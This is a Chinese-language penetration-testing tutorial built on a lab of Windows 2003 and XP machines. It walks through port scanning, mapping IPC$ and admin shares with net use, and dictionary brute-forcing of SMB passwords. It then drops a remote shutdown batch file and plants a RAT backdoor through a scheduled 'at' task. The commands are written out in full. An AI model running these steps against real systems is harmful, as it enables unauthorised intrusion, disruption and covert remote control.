渗透测试流程和简单案例
本文章仅供教学研究使用,切莫在真实环境中试验。
1渗透测试概述
- 渗透测试:渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
- 渗透测试分为 白盒测试 和 黑盒测试。
- 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析。
- 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透。
2渗透测试大致流程
- 授权允许测试,保证合法。
- 信息收集(nslookup、whois):收集名称、手机号、IP等信息,有利于破解密码。
- 扫描漏洞、端口等(利用nmap\scanport等工具或Telnet手工测试):
例子:nmap = ip范围 端口 80 (IIS系统类型、发布软件、扫描网站等,各种系统及发布方式都可能存在漏洞)→针对系统类型及其他信息,扫描其漏洞。 - 漏洞利用
- 提权(shell环境即命令环境、桌面环境、获取最高权限)
- 渗透测试报告(网络渗透人员)/为所欲为+毁尸灭迹+留后门(骇客)
3简单实验
3.1扫描
- 打开win2003及winxp,win2003配置固定IP10.1.1.1,winxp配置固定IP10.1.1.2,由winxp攻击win2003.
- win2003中→右键我的电脑→管理→服务→Telnet设为启动,注意常规和恢复中均需要设置。
- 在winxp中→cmd→telnet除了作为命令式远程管理外还可以作为探测工具→telnet 10.1.1.1 445
- 使用小工具scanport对目标IP群和端口群进行扫描,扫描后可以大概确定攻击目标。
3.2利用共享服务端口445漏洞之IPC$
- win2003中创建共享文件夹share,设置权限等。
- 在winxp中验证共享文件夹是否能访问。
- 将share文件夹映射到winxp本地盘符。winxp→cmd→net use f: \10.1.1.1\share ******** /user: administrator。注意f:后、/user前是有一个空格的。
- 相关命令:
net use #查看已建立映射列表
net use f: /del #删除f盘的映射
net use * /del #
net use f: \\10.1.1.1\C$ 密码 /user:账号
net use \\10.1.1.1\IPc$ 密码 /user:账号 #空连接,没有具体路径
net use f: \\10.1.1.1\IPc$ 密码 /user:账号
3.3修改用户名增加暴力破解难度的方式
- 对于账户未知的,账户和密码均需要暴力破解。
- 对于账户名,首先可以通过修改默认名称,避免直接利用默认名称进行密码暴力破解;其次,可以增加几个默认名称,设置为低权限的账户,让密码暴力破解作无用功。
- 服务器的账户可以对administrator账户名进行修改(右键计算机→管理),位置如下:
3.4暴力破解密码
- 在win2008中→cmd→net user administrator 123.com方便破解。
- 打开“真空密码字典生成器”→选择所需要的符号并设定密码长度范围→制作字典
- 打开NTscan软件,该软件仅针对445端口密码进行暴力破解,将上一步保存的字典复制黏贴到此处,并修改名字为NT_pass.dic,开始暴力破解。
3.5漏洞利用
- 向靶机C盘写入文件
#将靶机C盘映射到本地F盘
net use f:\\10.1.1.1\C$ 123.com /user:administrator
#将屏幕信息输入haha.bat
copy con haha.bat
shutdown -s -t 100
^Z
#将haha.bat复制到靶机C盘
copy haha.bat f:
在win2003C盘下生成该文件。
2. 开机默认映射共享文件。右键我的电脑→映射→输入驱动器和共享文件夹(在域中可以输入计算机名)→勾选登录时重连→输入账户密码。
3.6留后门
-
在winxp中利用“鸽子牧民战天”软件在win2003中留后门,避免管理员账户密码修改后,又需要暴力破解的繁琐过程。配置的各类参数如下,将来再kaili的学习中以下功能均可以采用代码完成。
-
让木马知道他的主人是谁。
-
获取靶机空链接的授权,将木马程序复制到目标路径下,并添加到计划任务中。
#获取靶机空链接权限
net use \\10.1.1.1\IPC$ 123.com /user:administrator
#将heihei.exe复制到靶机目录下
copy d:\heihei.exe \\10.1.1.1\C$\windows\system32\
#查看靶机当前时间
net time \\10.1.1.1
#在稍后几分钟自动添加一项作业任务
at \\10.1.1.1 12:55 "c:\windows\system32\heihei.exe"
#查看靶机计划任务
at \\10.1.1.1
4. 查看木马是否正常运行。
5. 随后可以通过该程序实时对靶机进行监视和控制。
总结
本节主要围绕网络渗透流程这一主题,从概述入手介绍主要步骤,随后对每个步骤采用一个小实验进行讲解分析。